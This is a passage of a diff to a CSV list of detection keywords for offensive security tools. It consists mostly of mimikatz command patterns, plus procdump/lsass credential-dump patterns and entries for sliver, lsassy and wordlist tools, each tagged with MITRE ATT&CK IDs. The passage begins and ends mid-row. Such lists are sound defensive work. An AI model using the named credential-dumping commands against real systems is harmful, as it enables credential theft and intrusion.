- TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::restore*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::security*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::sysenv*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::tcb*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::backup*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::debug*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::debug*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::driver*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::id*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::name*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::restore*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::security*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::sysenv*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::tcb*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*Privileged Accounts - Layers Analysis.txt*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Privileged Accounts Permissions - Final Report.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Privileged Accounts Permissions - Irregular Accounts.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" @@ -15142,39 +15310,39 @@ "*Privilegerx86.exe*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*PrivKit32*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*PrivKit-main*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" -"*Probable-Wordlists*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Probable-Wordlists*","offensive_tool_keyword","Probable-Wordlists","real password lists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Exploitation tools","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" +"*Probable-Wordlists*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Probable-Wordlists*","offensive_tool_keyword","Probable-Wordlists","real password lists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Exploitation tools","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*procdump* lsass.exe *.dmp*","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" "*procdump.exe*lsass*","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1003.001","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*procdump/dump_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*procdump_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*procdump_embedded*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*procdump_path=*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*process::exports*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::imports*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::resume*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::run*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::runp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::start*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::stop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::suspend*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process_herpaderping*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*procdump/dump_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*procdump_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*procdump_embedded*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*procdump_path=*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*process::exports*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::imports*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::resume*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation 